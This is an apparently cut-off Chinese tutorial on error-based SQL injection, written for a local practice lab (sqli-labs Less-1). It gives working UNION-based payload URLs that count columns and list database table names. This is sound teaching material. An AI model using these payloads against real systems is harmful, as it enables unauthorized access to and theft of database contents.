一、SQL注入
GET和POST请求
-
GET提交,请求的数据会附在URL之后(就是把数据放置在HTTP协议头中),以?分割URL 和传输数据,多个参数用&连接
-
POST提交:把提交的数据放置在是HTTP包的包体中。
因此,GET提交的数据会在地址栏中显示出来,而POST提交,地址栏不会改变
二、 GET基于报错的SQL注入
通过url中修改对应的ID值,为正常数字、字符(单引号,双引号,括号)、反斜线来探测url中是 否存在注入点
2.1 get基于报错的SQL注入利用
-
order by判断字段数
http://127.0.0.1/sqli/Less-1/?id=1’ order by 1 --+
-
利用union select联合查询,获取表名
http://127.0.0.1/sqli/Less-1/?id=0' union select 1,group_concat(table_name),3 from information_schema.`tables` where table_schema=database() --+
-
利用union select联合查询,获取字段名